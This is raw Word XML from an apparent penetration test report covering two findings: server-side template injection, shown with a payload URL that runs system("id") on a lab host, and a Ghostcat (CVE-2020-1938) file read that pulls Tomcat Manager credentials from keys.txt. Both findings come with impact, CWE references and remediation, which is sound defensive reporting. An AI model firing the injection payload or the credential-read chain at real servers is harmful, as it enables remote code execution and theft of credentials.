              <w:spacing w:after="0"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C13182" w:rsidRPr="00D77DFE" w14:paraId="48133CA2" w14:textId="77777777" w:rsidTr="00C13182">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044BCFE" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="066E6F23" w14:textId="77777777" w:rsidTr="00C13182">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509DCF5" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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C13182" w:rsidRPr="00D77DFE" w14:paraId="7D925879" w14:textId="77777777" w:rsidTr="00C13182">
        <w:trPr>
          <w:trHeight w:val="205"/>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5AA33CE" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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Server-side template injection is when an attacker </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>is able to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> use native template syntax to inject a malicious payload into a template, which is then executed server-side.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="5EC92E97" w14:textId="77777777" w:rsidTr="00C13182">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25916B6" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:spacing w:after="0"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Vulnerability Identified by / How It Was Discovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="00B8A6D7"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70D350A" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing w:val="0"/>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Manual analysing and testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="617A6AD6" w14:textId="77777777" w:rsidTr="00C13182">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6E5304A" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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C13182" w:rsidRPr="00D77DFE" w14:paraId="2833B695" w14:textId="77777777" w:rsidTr="00C13182">
        <w:trPr>
          <w:trHeight w:val="288"/>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06184E3" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:spacing w:after="0"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http://10.0.3.190/template_renderer?name=a</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>”;system</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(“id</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>”);/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="35353692"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2F03BDB"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C13182" w:rsidRPr="00D77DFE" w14:paraId="78891BD9" w14:textId="77777777" w:rsidTr="00C13182">
        <w:trPr>
          <w:trHeight w:val="270"/>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57B5C19" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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Failure to resolve the SSTI vulnerability exposes the system to full remote code execution, server information leakage, and potential data exfiltration of any files or application data accessible to the web process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="3A4A38B7"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EFE3BD5"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C13182" w:rsidRPr="00D77DFE" w14:paraId="48EDB648"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C6E9241" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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Disable or restrict the vulnerable template feature, validate and sanitize input to block template‑engine code, and harden the web server by limiting network access and tightening filesystem permissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="029DF28F"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276CCDC" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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C13182" w:rsidRPr="00D77DFE" w14:paraId="4174AAFC"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06F1B3D" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>During testing of http://10.0.3.190/template_renderer.php, the input field displayed in the welcome message was found to be vulnerable to Server‑Side Template Injection (SSTI). Submitting crafted payloads containing template expressions resulted in the template engine executing server‑side code instead of rendering the input as plain text. This allowed retrieval of server‑side output such as OS commands and PHP environment information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="5B74F657"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3D05C62" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:spacing w:after="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Proof Of Concept:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="7D79A648" w14:textId="77777777" w:rsidTr="00C13182">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11B402C" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of Concept evidence is provided in Appendix A</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA11" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:lang w:val="en-IN"/>
                </w:rPr>
                <w:t>Figure A.1.1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA12" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:lang w:val="en-IN"/>
                </w:rPr>
                <w:t>Figure A.1.2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="27BB3F62" w14:textId="77777777" w:rsidTr="00C13182">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EED113E" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C1318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C13182" w:rsidRPr="00D77DFE" w14:paraId="7658D222" w14:textId="77777777" w:rsidTr="00C13182">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57B4D7F" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId29" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/1336.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://portswigger.net/web-security/server-side-template-injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A7E3AB8" w14:textId="77777777" w:rsidR="00094048" w:rsidRPr="00D77DFE" w:rsidRDefault="00094048">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="page" w:tblpX="1516" w:tblpY="-285"/>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F527B3" w:rsidRPr="00D77DFE" w14:paraId="72D15338" w14:textId="77777777" w:rsidTr="00094048">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7A3D28D" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Sensitive Credentials Exposed Through Backend File Disclosure (Chained with CVE</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
              </w:rPr>
              <w:noBreakHyphen/>
              <w:t>2020</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
              </w:rPr>
              <w:noBreakHyphen/>
              <w:t>1938)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="2DC22B1C" w14:textId="77777777" w:rsidTr="00094048">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372900A"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D0CC3D9"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F527B3" w:rsidRPr="00D77DFE" w14:paraId="70A27B5E"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CFC8B65" w14:textId="40DA339F" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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VUL_02</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F7C5A56"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51424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="330DB67B" wp14:editId="4BA76C21">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>958850</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>34925</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1439180090"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EE0000"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:srgbClr val="EE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D48179C" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:75.5pt;margin-top:2.75pt;width:125.8pt;height:10.0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" fillcolor="#e00" strokecolor="#e00">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="1759F002"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463B518"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9.9</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0271B95" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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F527B3" w:rsidRPr="00D77DFE" w14:paraId="7E66B95D" w14:textId="77777777" w:rsidTr="00094048">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0593E23" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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AB1B482" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-200: Exposure of Sensitive Information to an Unauthorized Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="0CE60FF0"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5E21255"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F527B3" w:rsidRPr="00D77DFE" w14:paraId="60576DD5"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0FE217B" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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Browser, CyberCheff </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="25A57A22" w14:textId="77777777" w:rsidTr="00094048">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51D71DA" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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F527B3" w:rsidRPr="00D77DFE" w14:paraId="599DE7D1" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="205"/>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84B3E32" w14:textId="2718F520" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00215CCD" w:rsidP="00094048">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Due to the Ghostcat vulnerability (CVE‑2020‑1938), an attacker can read arbitrary files through the AJP connector. Using this flaw, the hidden file keys.txt, containing plaintext Tomcat Manager credentials, was retrieved, exposing sensitive data despite not being accessible through normal web routes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="5575C856"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9D32D19" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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F527B3" w:rsidRPr="00D77DFE" w14:paraId="758D74AC" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="288"/>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B7729DB" w14:textId="5EE8EB54" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00215CCD" w:rsidP="00094048">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId30" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:b w:val="0"/>
                  <w:sz w:val="20"/>
                </w:rPr>
                <w:t>http://10.0.2.178:8080/manager/html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> , </w:t>
            </w:r>
            <w:r w:rsidR="00F527B3" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0.2.178 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="7DEB2F69"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EC1DA94"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F527B3" w:rsidRPr="00D77DFE" w14:paraId="325C321E" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="270"/>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10D32A1" w14:textId="14D41480" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00094048">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This vulnerability enables complete server compromise through WAR deployment in Tomcat Manager, allows privilege escalation from simple file‑read access to full administrative control, and supports installation of persistent backdoors via malicious applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="684732B5"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5FB6465"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F527B3" w:rsidRPr="00D77DFE" w14:paraId="4344E93E"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89DA80E" w14:textId="18DFCB54" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00094048">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It is recommended to remove all secrets from application directories, rotate all exposed credentials immediately, and adopt secure secret‑management mechanisms such as environment variables, vault systems, or encrypted configuration files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="4327EBC2"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5B4C64A" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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F527B3" w:rsidRPr="00D77DFE" w14:paraId="32B8E992"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D320363" w14:textId="413DB9E7" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00094048">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Verify that the AJP connector is exposed and vulnerable, perform a controlled file‑read to retrieve keys.txt, observe it contains Tomcat Manager credentials, and use them to successfully authenticate, demonstrating full administrative compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="4D0387C1"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AE56292" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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F527B3" w:rsidRPr="00D77DFE" w14:paraId="1706FD6C"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EF63975" w14:textId="67387BF5" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="009E4D57" w:rsidP="00094048">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="FigureA21" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:noProof/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.2.1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA22" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:noProof/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.2.2</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sensitive Credentials Exposed Through Backend File Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w14:paraId="3E1EBACC" w14:textId="77777777" w:rsidTr="00094048">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234C964" w14:textId="77777777" w:rsidR="00F527B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00F527B3" w:rsidP="00094048">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431D09" w:rsidRPr="00D77DFE" w14:paraId="523A4CDF" w14:textId="77777777" w:rsidTr="00094048">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ED1D08A" w14:textId="5F25A4D7" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00686E5B" w:rsidP="00094048">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId31" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/200.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
